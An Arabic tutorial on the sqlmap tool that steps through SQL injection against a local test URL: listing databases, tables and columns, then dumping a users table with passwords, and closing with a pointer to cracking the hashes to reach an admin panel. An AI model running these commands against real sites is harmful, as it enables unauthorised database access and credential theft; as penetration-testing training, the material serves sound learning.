دليل المستخدم في SQLMAP

SQLMAP

الدرس موجه ﻷغراض تعليمية و الكاتب و الموقع غير مسؤوﻻن عن أي أفعال تصدر منك باستخدامك للمعلومات المذكورة في الدرس.الدرس موجه لمن يمتلكون خبرة و لو بسيطة في التعامل مع أنظمة اختبار اﻹختراق كباك تراك و كالي لينكس،لن يتم التطبيق على أهداف حقيقة لتجنب اﻹستخدام السيء و الملاحقات القانونية.الدرس عبارة عن سيناريو تخيلي لعملية إختراق حقيقية و لكن بتحفظ 


يعتبر مشروع SQLMAP أحد أكثر مشاريع إختبار اﻹختراق انتشارا سواء في أوساط الهاكرز اﻷخلاقيين أو غيرهم من اصحاب القبعات السوداء،لعدة أسباب أهمها الفعالية الكبيرة التي يتميز بها هذا البرنامج عن غيره من البرامج التي تتيح فحص مختلف قواعد البيانات.

تمت برمجة مشروع SQLMAP باستخدام لغة البرمجة بايثون،بحيث تم التركيز على جعلها آداة خفيفة على ذاكرة الجهاز مع عدم إغفال الفاعلية،و على حسب مطوريها فإنهم وجدوا ذلك في بايثون.

بإمكان أداة SQLMAP القيام بفحص عدة أنواع من قواعد البيانات و هي:
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,
SQLite, Firebird, Sybase and SAP MaxDB database management systems.
طريقة اﻹستخدام: بالنسبة لمن يستخدمون نظام باك تراك فعليهم كتابة اﻷوامر كالتالي
./sqlmap.py command
في حين من يستخدمون نظام كالي لينكس فعليهم كتابة اﻷوامر كالتالي:
sqlmap command
باعتبار أني من مستخدمي كالي لينكس فسأستعمل اﻷمر الثاني.ﻻستعراض قواعد البيانات الموجودة على السيرفر يكفي كتابة اﻷمر التالي:
sqlmap -u "http://127.0.0.1/vurln.php?user=relax" –dbs –dbms=mysql
 دعونا نشرح هذا اﻷمر بالتفصيل:
sqlmap : و هو مشروعنا الذي هو محور الدرس بطبيعة الحال
u- : و معناها أننا نريد فحص URL مشكوك في أمره،يجب كتابة العنوان مباشرة بعد u- بين علامتي تنصيص مزدوجتين "URL"
الرابط الذي أرفقناه هو عبارة عن رابط عضوية الشخص المسمى relax.
dbs- : و معناها أننا نطلب من مشروع SQLMAP التحري عن كل قواعد البيانات و عرض أسمائها
dbms=mysql- : و معناها أننا نخبر مشروع SQLMAP بأن السيرفر يستخدم محرك قواعد البيانات MySQL
سنفترض أنه المشروع قد قام بالبحث و وجدت عددا من قواعد البيانات هي كالتالي:
available databases [4]:
    information_schema
    mysql
    performance_schema
    vurln
سنستهدف اﻵن قاعدة البيانات vurln و نريد استعراض الجداول التي تحويها...اﻷمر بسيط جدا فكل ما عليك فعله هو تطبيق اﻷمر التالي:
sqlmap -u "http://127.0.0.1/vurln.php?user=relax" -D vurln –tables 
أعتقد أن اﻷمر بسيط و لم يتغير كثيرا عن سابقه إﻻ في نهايته:
D- معناها قم بعملية Dumping لقاعدة البيانات vurln و قم باستخراج ما سنطلبه و هو
tables- : بعد انتهاء عملية Dumping قم باستعراض جداول قاعدة البيانات و لنفترض أنها تحوي جدوﻻ واحدا هو جدول المستخدمين
Database: vurln
[1 table]
+-------+
| users |
+-------+ 
اﻵن سنعمل على استخراج الخانات الموجودة في الجدول users عن طريق اﻷمر التالي:
sqlmap -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –col 
سنشرح فقط اﻷجزاء الجديدة من اﻷمر،بعد القيام بعملية Dumping لقاعدة البيانات:
T- معناها أعد عملية Dumping للجدول المعطى و هو users
 col– : و معناها استخرج الخانات Columns و سنفترض أنه قد أعطانا النتيجة التالية:
Database: vurln
Table: users
[3 columns]
+----------+-------------+
| Column      Type            |
+----------+-------------+
| ID            | tinyint(4)     |
| password | varchar(32) |
| username | varchar(20) |
+----------+-------------+
أخيرا و ﻹتمام العملية لم يبقى لنا سوى العمل على استعراض الجدول عن طريق اﻷمر
sqlmap -u "http://127.0.0.1/vurln.php?user=relax" -D vurln -T users –dump 
لم يبقى أمامك إﻻ كسر تشفير كلمات المرور من أجل الدخول إلى لوحة تحكم اﻹدارة. 

تعليقات